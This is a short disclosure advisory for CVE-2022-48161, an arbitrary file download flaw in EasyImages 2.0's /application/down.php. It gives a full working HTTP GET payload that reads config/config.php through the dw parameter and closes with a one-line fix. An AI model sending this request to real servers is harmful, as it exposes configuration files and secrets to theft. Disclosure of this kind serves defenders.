Headline
CVE-2022-48161: GitHub - sunset-move/EasyImages2.0-arbitrary-file-download-vulnerability: EasyImages2.0 arbitrary file download vulnerability
Easy Images v2.0 was discovered to contain an arbitrary file download vulnerability via the component /application/down.php. This vulnerability is exploited via a crafted GET request.
EasyImages2.0-arbitrary-file-download-vulnerability****Found on: 2022-12-27****Impact version
EasyImages2.0 ≤ v2.6.7
Analysis Report:
Vulnerability path: /application/down.php
payload:
GET /application/down.php?dw=config/config.php HTTP/1.1 Host: 192.168.2.13 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1672116632; Hm_lpvt_c790ac2bdc2f385757ecd0183206108d=1672149755 Connection: close
You can download any file in the host by passing the dw parameter to the get request
Fixes
Specify the download directory to download only for the specified directory, other directories are filtered and requests are rejected.